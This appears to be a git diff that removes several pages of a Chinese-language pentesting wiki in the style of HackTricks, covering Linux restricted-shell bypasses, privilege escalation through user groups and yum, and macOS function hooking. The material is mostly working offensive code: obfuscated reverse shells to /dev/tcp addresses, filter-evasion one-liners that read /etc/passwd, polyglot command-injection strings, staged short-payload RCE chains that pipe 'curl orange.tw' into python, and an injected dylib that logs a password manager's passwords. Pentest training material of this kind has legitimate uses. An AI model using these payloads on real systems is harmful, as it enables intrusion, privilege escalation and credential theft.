find / -maxdepth 5 -type f -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
# Found Newer directory only and sort by time. (depth = 5)
find / -maxdepth 5 -type d -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
```
## Nmap 搜索帮助
```bash
#Nmap scripts ((default or version) and smb))
nmap --script-help "(default or version) and *smb*"
locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb
nmap --script-help "(default or version) and smb)"
```
## Bash
```bash
#All bytes inside a file (except 0x20 and 0x00)
for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done
```
## Iptables
```bash
#Delete curent rules and chains
iptables --flush
iptables --delete-chain
#allow loopback
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
#drop ICMP
iptables -A INPUT -p icmp -m icmp --icmp-type any -j DROP
iptables -A OUTPUT -p icmp -j DROP
#allow established connections
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
#allow ssh, http, https, dns
iptables -A INPUT -s 10.10.10.10/24 -p tcp -m tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPT
iptables -A INPUT -p udp -m udp --sport 53 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --sport 53 -j ACCEPT
iptables -A OUTPUT -p udp -m udp --dport 53 -j ACCEPT
iptables -A OUTPUT -p tcp -m tcp --dport 53 -j ACCEPT
#default policies
iptables -P INPUT DROP
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
```
{{#include ../../banners/hacktricks-training.md}}

319
src/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
View File

@ -1,319 +0,0 @@
# 绕过 Linux 限制
{{#include ../../banners/hacktricks-training.md}}
## 常见限制绕过
### 反向 Shell
```bash
# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
# echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
```
### 短 Rev shell
```bash
#Trick from Dikline
#Get a rev shell with
(sh)0>/dev/tcp/10.10.10.10/443
#Then get the out of the rev shell executing inside of it:
exec >&0
```
### 绕过路径和禁止词汇
```bash
# Question mark binary substitution
/usr/bin/p?ng # /usr/bin/ping
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost
# Wildcard(*) binary substitution
/usr/bin/who*mi # /usr/bin/whoami
# Wildcard + local directory arguments
touch -- -la # -- stops processing options after the --
ls *
echo * #List current files and folders with echo and wildcard
# [chars]
/usr/bin/n[c] # /usr/bin/nc
# Quotes
'p'i'n'g # ping
"w"h"o"a"m"i # whoami
ech''o test # echo test
ech""o test # echo test
bas''e64 # base64
#Backslashes
\u\n\a\m\e \-\a # uname -a
/\b\i\n/////s\h
# $@
who$@ami #whoami
# Transformations (case, reverse, base64)
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case
$(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)
$(rev<<<'imaohw') #whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64
# Execution through $0
echo whoami|$0
# Uninitialized variables: A uninitialized variable equals to null (nothing)
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters
# Fake commands
p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown
# Concatenation of strings using history
!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command
mi # This will throw an error
whoa # This will throw an error
!-1!-2 # This will execute whoami
```
### 绕过禁止的空格
```bash
# {form}
{cat,lol.txt} # cat lol.txt
{echo,test} # echo test
# IFS - Internal field separator, change " " for any other character ("]" in this case)
cat${IFS}/etc/passwd # cat /etc/passwd
cat$IFS/etc/passwd # cat /etc/passwd
# Put the command line in a variable and then execute it
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
# Other way, just change each space for ${IFS}
echo${IFS}test
# Using hex format
X=$'cat\x20/etc/passwd'&&$X
# Using tabs
echo "ls\x09-l" | bash
# New lines
p\
i\
n\
g # These 4 lines will equal to ping
# Undefined variables and !
$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
uname!-1\-a # This equals to uname -a
```
### 绕过反斜杠和斜杠
```bash
cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
```
### 绕过管道
```bash
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
```
### 使用十六进制编码绕过
```bash
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
cat `xxd -r -p <<< 2f6574632f706173737764`
xxd -r -ps <(echo 2f6574632f706173737764)
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
```
### 绕过 IPs
```bash
# Decimal IPs
127.0.0.1 == 2130706433
```
### 基于时间的数据外泄
```bash
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
```
### 从环境变量获取字符
```bash
echo ${LS_COLORS:10:1} #;
echo ${PATH:0:1} #/
```
### DNS 数据外泄
您可以使用 **burpcollab** 或 [**pingb**](http://pingb.in) 作为例子。
### 内置命令
如果您无法执行外部函数,并且只能访问 **有限的内置命令以获得 RCE**,那么有一些方便的技巧可以做到这一点。通常您 **无法使用所有****内置命令**,因此您应该 **了解所有选项** 以尝试绕过监狱。灵感来自 [**devploit**](https://twitter.com/devploit)。\
首先检查所有的 [**shell 内置命令**](https://www.gnu.org/software/bash/manual/html_node/Shell-Builtin-Commands.html)**。** 然后这里有一些 **建议**
```bash
# Get list of builtins
declare builtins
# In these cases PATH won't be set, so you can try to set it
PATH="/bin" /bin/ls
export PATH="/bin"
declare PATH="/bin"
SHELL=/bin/bash
# Hex
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
# Input
read aaa; exec $aaa #Read more commands to execute and execute them
read aaa; eval $aaa
# Get "/" char using printf and env vars
printf %.1s "$PWD"
## Execute /bin/ls
$(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls
## To get several letters you can use a combination of printf and
declare
declare functions
declare historywords
# Read flag in current dir
source f*
flag.txt:1: command not found: CTF{asdasdasd}
# Read file with read
while read -r line; do echo $line; done < /etc/passwd
# Get env variables
declare
# Get history
history
declare history
declare historywords
# Disable special builtins chars so you can abuse them as scripts
[ #[: ']' expected
## Disable "[" as builtin and enable it as script
enable -n [
echo -e '#!/bin/bash\necho "hello!"' > /tmp/[
chmod +x [
export PATH=/tmp:$PATH
if [ "a" ]; then echo 1; fi # Will print hello!
```
### 多语言命令注入
```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
```
### 绕过潜在的正则表达式
```bash
# A regex that only allow letters and numbers might be vulnerable to new line characters
1%0a`curl http://attacker.com`
```
### Bashfuscator
```bash
# From https://github.com/Bashfuscator/Bashfuscator
./bashfuscator -c 'cat /etc/passwd'
```
### 5个字符的RCE
```bash
# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
#Oragnge Tsai solution
## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
http://host/?cmd=>ls\
http://host/?cmd=ls>_
http://host/?cmd=>\ \
http://host/?cmd=>-t\
http://host/?cmd=>\>g
http://host/?cmd=ls>>_
## Step2: generate `curl orange.tw|python` to file "g"
## by creating the necesary filenames and writting that content to file "g" executing the previous generated file
http://host/?cmd=>on
http://host/?cmd=>th\
http://host/?cmd=>py\
http://host/?cmd=>\|\
http://host/?cmd=>tw\
http://host/?cmd=>e.\
http://host/?cmd=>ng\
http://host/?cmd=>ra\
http://host/?cmd=>o\
http://host/?cmd=>\ \
http://host/?cmd=>rl\
http://host/?cmd=>cu\
http://host/?cmd=sh _
# Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file
## Finally execute the file "g"
http://host/?cmd=sh g
# Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"
https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
## Execute tar command over a folder
http://52.199.204.34/?cmd=>tar
http://52.199.204.34/?cmd=>zcf
http://52.199.204.34/?cmd=>zzz
http://52.199.204.34/?cmd=*%20/h*
# Another curiosity if you can read files of the current folder
ln /f*
## If there is a file /flag.txt that will create a hard link
## to it in the current folder
```
### 4个字符的RCE
```bash
# In a similar fashion to the previous bypass this one just need 4 chars to execute commands
# it will follow the same principle of creating the command `ls -t>g` in a file
# and then generate the full command in filenames
# generate "g> ht- sl" to file "v"
'>dir'
'>sl'
'>g\>'
'>ht-'
'*>v'
# reverse file "v" to file "x", content "ls -th >g"
'>rev'
'*v>x'
# generate "curl orange.tw|python;"
'>\;\\'
'>on\\'
'>th\\'
'>py\\'
'>\|\\'
'>tw\\'
'>e.\\'
'>ng\\'
'>ra\\'
'>o\\'
'>\ \\'
'>rl\\'
'>cu\\'
# got shell
'sh x'
'sh g'
```
## 只读/无执行/无发行版绕过
如果您在一个具有**只读和无执行保护**的文件系统中,甚至在一个无发行版容器中,仍然有方法可以**执行任意二进制文件,甚至是一个 shell:**
{{#ref}}
../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/
{{#endref}}
## Chroot 和其他监狱绕过
{{#ref}}
../privilege-escalation/escaping-from-limited-bash.md
{{#endref}}
## 参考资料与更多
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits)
- [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet)
- [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
- [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
{{#include ../../banners/hacktricks-training.md}}

23
src/linux-unix/privilege-escalation/exploiting-yum.md
View File

@ -1,23 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
关于yum的更多示例可以在[gtfobins](https://gtfobins.github.io/gtfobins/yum/)上找到。
# 通过RPM包执行任意命令
## 检查环境
为了利用这个向量用户必须能够以更高权限的用户即root执行yum命令。
### 这个向量的一个有效示例
这个漏洞的有效示例可以在[tryhackme](https://tryhackme.com)的[daily bugle](https://tryhackme.com/room/dailybugle)房间中找到。
## 打包RPM
在接下来的部分中,我将介绍如何使用[fpm](https://github.com/jordansissel/fpm)将反向shell打包到RPM中。
下面的示例创建了一个包含任意脚本的安装前触发器的包该脚本可以由攻击者定义。安装时此包将执行任意命令。我使用了一个简单的反向netcat shell示例进行演示但这可以根据需要进行更改。
```text
```
{{#include ../../banners/hacktricks-training.md}}

140
src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
View File

@ -1,140 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
# Sudo/Admin Groups
## **PE - 方法 1**
**有时****默认情况下(或因为某些软件需要它)**在 **/etc/sudoers** 文件中你可以找到一些这样的行:
```bash
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# Allow members of group admin to execute any command
%admin ALL=(ALL:ALL) ALL
```
这意味着 **任何属于 sudo 或 admin 组的用户都可以以 sudo 身份执行任何操作**
如果是这种情况,要 **成为 root你只需执行**
```text
sudo su
```
## PE - 方法 2
查找所有 suid 二进制文件,并检查是否存在二进制文件 **Pkexec**
```bash
find / -perm -4000 2>/dev/null
```
如果您发现二进制文件 pkexec 是一个 SUID 二进制文件,并且您属于 sudo 或 admin您可能可以使用 pkexec 作为 sudo 执行二进制文件。检查以下内容:
```bash
cat /etc/polkit-1/localauthority.conf.d/*
```
您将找到哪些组被允许执行 **pkexec**,并且在某些 Linux 中,**默认情况下**可能会出现一些 **sudo 或 admin** 组。
**成为 root您可以执行**
```bash
pkexec "/bin/sh" #You will be prompted for your user password
```
如果你尝试执行 **pkexec** 并且收到这个 **错误**
```bash
polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized
```
**这不是因为你没有权限,而是因为你没有通过 GUI 连接**。对此问题有一个解决方法在这里: [https://github.com/NixOS/nixpkgs/issues/18012\#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903)。你需要 **2 个不同的 ssh 会话**:
```bash:session1
echo $$ #Step1: Get current PID
pkexec "/bin/bash" #Step 3, execute pkexec
#Step 5, if correctly authenticate, you will have a root session
```
```bash:session2
pkttyagent --process <PID of session1> #Step 2, attach pkttyagent to session1
#Step 4, you will be asked in this session to authenticate to pkexec
```
# Wheel Group
**有时****默认情况下**在 **/etc/sudoers** 文件中可以找到这一行:
```text
%wheel ALL=(ALL:ALL) ALL
```
这意味着 **任何属于 wheel 组的用户都可以以 sudo 执行任何操作**
如果是这样,要 **成为 root你只需执行**
```text
sudo su
```
# Shadow Group
来自 **group shadow** 的用户可以 **读取** **/etc/shadow** 文件:
```text
-rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow
```
所以,阅读文件并尝试**破解一些哈希**。
# 磁盘组
这个权限几乎**等同于根访问**,因为您可以访问机器内部的所有数据。
文件:`/dev/sd[a-z][1-9]`
```text
debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow
```
请注意,使用 debugfs 你也可以 **写入文件**。例如,要将 `/tmp/asd1.txt` 复制到 `/tmp/asd2.txt`,你可以这样做:
```bash
debugfs -w /dev/sda1
debugfs: dump /tmp/asd1.txt /tmp/asd2.txt
```
然而,如果你尝试**写入由 root 拥有的文件**(如 `/etc/shadow``/etc/passwd`),你将会遇到“**权限被拒绝**”错误。
# 视频组
使用命令 `w` 你可以找到**谁已登录系统**,它将显示如下输出:
```bash
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
yossi tty1 22:16 5:13m 0.05s 0.04s -bash
moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash
```
**tty1** 表示用户 **yossi 物理上登录** 到机器上的一个终端。
**video group** 有权限查看屏幕输出。基本上,你可以观察屏幕。为了做到这一点,你需要 **抓取当前屏幕上的图像** 的原始数据,并获取屏幕使用的分辨率。屏幕数据可以保存在 `/dev/fb0` 中,你可以在 `/sys/class/graphics/fb0/virtual_size` 找到该屏幕的分辨率。
```bash
cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size
```
要**打开** **原始图像**,您可以使用**GIMP**,选择**`screen.raw`**文件,并选择文件类型为**原始图像数据**
![](../../images/image%20%28208%29.png)
然后将宽度和高度修改为屏幕上使用的值,并检查不同的图像类型(并选择显示屏幕效果更好的那个):
![](../../images/image%20%28295%29.png)
# Root Group
看起来默认情况下**root组的成员**可以访问**修改**某些**服务**配置文件或某些**库**文件或**其他有趣的东西**,这些都可以用来提升权限...
**检查root成员可以修改哪些文件**
```bash
find / -group root -perm -g=w 2>/dev/null
```
# Docker 组
您可以将主机的根文件系统挂载到实例的卷中,因此当实例启动时,它会立即加载一个 `chroot` 到该卷。这实际上使您在机器上获得了 root 权限。
{{#ref}}
https://github.com/KrustyHack/docker-privilege-escalation
{{#endref}}
{{#ref}}
https://fosterelli.co/privilege-escalation-via-docker.html
{{#endref}}
# lxc/lxd 组
[lxc - 权限提升](lxd-privilege-escalation.md)
{{#include ../../banners/hacktricks-training.md}}

338
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md
View File

@ -1,338 +0,0 @@
# macOS Function Hooking
{{#include ../../../banners/hacktricks-training.md}}
## Function Interposing
创建一个带有 **`__interpose`** 部分(或标记为 **`S_INTERPOSING`** 的部分)的 **dylib**,其中包含指向 **原始****替代** 函数的 **函数指针** 元组。
然后,使用 **`DYLD_INSERT_LIBRARIES`** 注入 dylib插入需要在主应用加载之前发生。显然适用于 **`DYLD_INSERT_LIBRARIES`** 使用的 [**限制** 在这里也适用](../macos-proces-abuse/macos-library-injection/index.html#check-restrictions)。
### Interpose printf
{{#tabs}}
{{#tab name="interpose.c"}}
```c:interpose.c
// gcc -dynamiclib interpose.c -o interpose.dylib
#include <stdio.h>
#include <stdarg.h>
int my_printf(const char *format, ...) {
//va_list args;
//va_start(args, format);
//int ret = vprintf(format, args);
//va_end(args);
int ret = printf("Hello from interpose\n");
return ret;
}
__attribute__((used)) static struct { const void *replacement; const void *replacee; } _interpose_printf
__attribute__ ((section ("__DATA,__interpose"))) = { (const void *)(unsigned long)&my_printf, (const void *)(unsigned long)&printf };
```
{{#endtab}}
{{#tab name="hello.c"}}
```c
//gcc hello.c -o hello
#include <stdio.h>
int main() {
printf("Hello World!\n");
return 0;
}
```
{{#endtab}}
{{#tab name="interpose2.c"}}
```c
// Just another way to define an interpose
// gcc -dynamiclib interpose2.c -o interpose2.dylib
#include <stdio.h>
#define DYLD_INTERPOSE(_replacement, _replacee) \
__attribute__((used)) static struct { \
const void* replacement; \
const void* replacee; \
} _interpose_##_replacee __attribute__ ((section("__DATA, __interpose"))) = { \
(const void*) (unsigned long) &_replacement, \
(const void*) (unsigned long) &_replacee \
};
int my_printf(const char *format, ...)
{
int ret = printf("Hello from interpose\n");
return ret;
}
DYLD_INTERPOSE(my_printf,printf);
```
{{#endtab}}
{{#endtabs}}
```bash
DYLD_INSERT_LIBRARIES=./interpose.dylib ./hello
Hello from interpose
DYLD_INSERT_LIBRARIES=./interpose2.dylib ./hello
Hello from interpose
```
## 方法交换
在 ObjectiveC 中,方法调用的方式是:**`[myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2]`**
需要 **对象**、**方法**和 **参数**。当调用一个方法时,会使用函数 **`objc_msgSend`** 发送 **msg**`int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);`
对象是 **`someObject`**,方法是 **`@selector(method1p1:p2:)`**,参数是 **value1****value2**。
根据对象结构,可以访问一个 **方法数组**,其中 **名称****方法代码的指针****存放**
> [!CAUTION]
> 请注意,由于方法和类是基于其名称访问的,因此这些信息存储在二进制文件中,因此可以使用 `otool -ov </path/bin>` 或 [`class-dump </path/bin>`](https://github.com/nygard/class-dump) 检索它。
### 访问原始方法
可以访问方法的信息,例如名称、参数数量或地址,如以下示例所示:
```objectivec
// gcc -framework Foundation test.m -o test
#import <Foundation/Foundation.h>
#import <objc/runtime.h>
#import <objc/message.h>
int main() {
// Get class of the variable
NSString* str = @"This is an example";
Class strClass = [str class];
NSLog(@"str's Class name: %s", class_getName(strClass));
// Get parent class of a class
Class strSuper = class_getSuperclass(strClass);
NSLog(@"Superclass name: %@",NSStringFromClass(strSuper));
// Get information about a method
SEL sel = @selector(length);
NSLog(@"Selector name: %@", NSStringFromSelector(sel));
Method m = class_getInstanceMethod(strClass,sel);
NSLog(@"Number of arguments: %d", method_getNumberOfArguments(m));
NSLog(@"Implementation address: 0x%lx", (unsigned long)method_getImplementation(m));
// Iterate through the class hierarchy
NSLog(@"Listing methods:");
Class currentClass = strClass;
while (currentClass != NULL) {
unsigned int inheritedMethodCount = 0;
Method* inheritedMethods = class_copyMethodList(currentClass, &inheritedMethodCount);
NSLog(@"Number of inherited methods in %s: %u", class_getName(currentClass), inheritedMethodCount);
for (unsigned int i = 0; i < inheritedMethodCount; i++) {
Method method = inheritedMethods[i];
SEL selector = method_getName(method);
const char* methodName = sel_getName(selector);
unsigned long address = (unsigned long)method_getImplementation(m);
NSLog(@"Inherited method name: %s (0x%lx)", methodName, address);
}
// Free the memory allocated by class_copyMethodList
free(inheritedMethods);
currentClass = class_getSuperclass(currentClass);
}
// Other ways to call uppercaseString method
if([str respondsToSelector:@selector(uppercaseString)]) {
NSString *uppercaseString = [str performSelector:@selector(uppercaseString)];
NSLog(@"Uppercase string: %@", uppercaseString);
}
// Using objc_msgSend directly
NSString *uppercaseString2 = ((NSString *(*)(id, SEL))objc_msgSend)(str, @selector(uppercaseString));
NSLog(@"Uppercase string: %@", uppercaseString2);
// Calling the address directly
IMP imp = method_getImplementation(class_getInstanceMethod(strClass, @selector(uppercaseString))); // Get the function address
NSString *(*callImp)(id,SEL) = (typeof(callImp))imp; // Generates a function capable to method from imp
NSString *uppercaseString3 = callImp(str,@selector(uppercaseString)); // Call the method
NSLog(@"Uppercase string: %@", uppercaseString3);
return 0;
}
```
### 方法交换与 method_exchangeImplementations
函数 **`method_exchangeImplementations`** 允许 **更改** **一个函数的实现地址为另一个函数**
> [!CAUTION]
> 因此,当调用一个函数时,**执行的是另一个函数**。
```objectivec
//gcc -framework Foundation swizzle_str.m -o swizzle_str
#import <Foundation/Foundation.h>
#import <objc/runtime.h>
// Create a new category for NSString with the method to execute
@interface NSString (SwizzleString)
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from;
@end
@implementation NSString (SwizzleString)
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from {
NSLog(@"Custom implementation of substringFromIndex:");
// Call the original method
return [self swizzledSubstringFromIndex:from];
}
@end
int main(int argc, const char * argv[]) {
// Perform method swizzling
Method originalMethod = class_getInstanceMethod([NSString class], @selector(substringFromIndex:));
Method swizzledMethod = class_getInstanceMethod([NSString class], @selector(swizzledSubstringFromIndex:));
method_exchangeImplementations(originalMethod, swizzledMethod);
// We changed the address of one method for the other
// Now when the method substringFromIndex is called, what is really called is swizzledSubstringFromIndex
// And when swizzledSubstringFromIndex is called, substringFromIndex is really colled
// Example usage
NSString *myString = @"Hello, World!";
NSString *subString = [myString substringFromIndex:7];
NSLog(@"Substring: %@", subString);
return 0;
}
```
> [!WARNING]
> 在这种情况下,如果**合法**方法的**实现代码**对**方法**的**名称**进行**验证**,它可能会**检测到**这种方法交换并阻止其运行。
>
> 以下技术没有这个限制。
### 使用 method_setImplementation 进行方法交换
之前的格式很奇怪,因为你正在将两个方法的实现互相更改。使用函数**`method_setImplementation`**,你可以**更改**一个**方法的实现为另一个**。
只需记住,如果你打算在覆盖之前从新实现中调用原始实现,请**存储原始实现的地址**,因为稍后定位该地址会更加复杂。
```objectivec
#import <Foundation/Foundation.h>
#import <objc/runtime.h>
#import <objc/message.h>
static IMP original_substringFromIndex = NULL;
@interface NSString (Swizzlestring)
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from;
@end
@implementation NSString (Swizzlestring)
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from {
NSLog(@"Custom implementation of substringFromIndex:");
// Call the original implementation using objc_msgSendSuper
return ((NSString *(*)(id, SEL, NSUInteger))original_substringFromIndex)(self, _cmd, from);
}
@end
int main(int argc, const char * argv[]) {
@autoreleasepool {
// Get the class of the target method
Class stringClass = [NSString class];
// Get the swizzled and original methods
Method originalMethod = class_getInstanceMethod(stringClass, @selector(substringFromIndex:));
// Get the function pointer to the swizzled method's implementation
IMP swizzledIMP = method_getImplementation(class_getInstanceMethod(stringClass, @selector(swizzledSubstringFromIndex:)));
// Swap the implementations
// It return the now overwritten implementation of the original method to store it
original_substringFromIndex = method_setImplementation(originalMethod, swizzledIMP);
// Example usage
NSString *myString = @"Hello, World!";
NSString *subString = [myString substringFromIndex:7];
NSLog(@"Substring: %@", subString);
// Set the original implementation back
method_setImplementation(originalMethod, original_substringFromIndex);
return 0;
}
}
```
## Hooking Attack Methodology
在本页中讨论了不同的函数钩取方法。然而,它们涉及到**在进程内部运行代码进行攻击**。
为了做到这一点,最简单的技术是通过环境变量或劫持来注入一个[Dyld](../macos-dyld-hijacking-and-dyld_insert_libraries.md)。然而,我想这也可以通过[Dylib进程注入](macos-ipc-inter-process-communication/index.html#dylib-process-injection-via-task-port)来完成。
然而,这两种选项都**限制**于**未保护**的二进制文件/进程。检查每种技术以了解更多关于限制的信息。
然而,函数钩取攻击是非常具体的,攻击者这样做是为了**从进程内部窃取敏感信息**否则你只会进行进程注入攻击。而这些敏感信息可能位于用户下载的应用程序中例如MacPass。
因此攻击者的途径是找到一个漏洞或去掉应用程序的签名通过应用程序的Info.plist注入**`DYLD_INSERT_LIBRARIES`**环境变量,添加类似于:
```xml
<key>LSEnvironment</key>
<dict>
<key>DYLD_INSERT_LIBRARIES</key>
<string>/Applications/Application.app/Contents/malicious.dylib</string>
</dict>
```
然后**重新注册**该应用程序:
```bash
/System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -f /Applications/Application.app
```
在该库中添加钩子代码以提取信息:密码、消息...
> [!CAUTION]
> 请注意,在较新版本的 macOS 中,如果您 **去除应用程序二进制文件的签名** 并且它之前已被执行macOS **将不再执行该应用程序**
#### 库示例
```objectivec
// gcc -dynamiclib -framework Foundation sniff.m -o sniff.dylib
// If you added env vars in the Info.plist don't forget to call lsregister as explained before
// Listen to the logs with something like:
// log stream --style syslog --predicate 'eventMessage CONTAINS[c] "Password"'
#include <Foundation/Foundation.h>
#import <objc/runtime.h>
// Here will be stored the real method (setPassword in this case) address
static IMP real_setPassword = NULL;
static BOOL custom_setPassword(id self, SEL _cmd, NSString* password, NSURL* keyFileURL)
{
// Function that will log the password and call the original setPassword(pass, file_path) method
NSLog(@"[+] Password is: %@", password);
// After logging the password call the original method so nothing breaks.
return ((BOOL (*)(id,SEL,NSString*, NSURL*))real_setPassword)(self, _cmd, password, keyFileURL);
}
// Library constructor to execute
__attribute__((constructor))
static void customConstructor(int argc, const char **argv) {
// Get the real method address to not lose it
Class classMPDocument = NSClassFromString(@"MPDocument");
Method real_Method = class_getInstanceMethod(classMPDocument, @selector(setPassword:keyFileURL:));
// Make the original method setPassword call the fake implementation one
IMP fake_IMP = (IMP)custom_setPassword;
real_setPassword = method_setImplementation(real_Method, fake_IMP);
}
```
## 参考
- [https://nshipster.com/method-swizzling/](https://nshipster.com/method-swizzling/)
{{#include ../../../banners/hacktricks-training.md}}

95
src/misc/references.md
View File

@ -1,95 +0,0 @@
{{#include ../banners/hacktricks-training.md}}
{{#ref}}
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick
{{#endref}}
{{#ref}}
https://hausec.com/pentesting-cheatsheet/#_Toc475368982
{{#endref}}
{{#ref}}
https://anhtai.me/pentesting-cheatsheet/
{{#endref}}
{{#ref}}
https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html
{{#endref}}
{{#ref}}
https://ired.team/offensive-security-experiments/offensive-security-cheetsheets
{{#endref}}
{{#ref}}
https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html
{{#endref}}
{{#ref}}
https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md
{{#endref}}
{{#ref}}
https://anhtai.me/oscp-fun-guide/
{{#endref}}
{{#ref}}
https://www.thehacker.recipes/
{{#endref}}
{{#ref}}
https://github.com/swisskyrepo/PayloadsAllTheThings
{{#endref}}
{{#ref}}
https://gtfobins.github.io/
{{#endref}}
{{#ref}}
https://github.com/RistBS/Awesome-RedTeam-Cheatsheet
{{#endref}}
{{#ref}}
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
{{#endref}}
{{#ref}}
https://hideandsec.sh/
{{#endref}}
{{#ref}}
https://cheatsheet.haax.fr/
{{#endref}}
{{#ref}}
https://infosecwriteups.com/
{{#endref}}
{{#ref}}
https://www.exploit-db.com/
{{#endref}}
{{#ref}}
https://wadcoms.github.io/
{{#endref}}
{{#ref}}
https://lolbas-project.github.io
{{#endref}}
{{#ref}}
https://pentestbook.six2dez.com/
{{#endref}}
{{#ref}}
https://www.hackingarticles.in/
{{#endref}}
{{#ref}}
https://pentestlab.blog/
{{#endref}}
{{#ref}}
https://ippsec.rocks/
{{#endref}}
{{#include ../banners/hacktricks-training.md}}

32
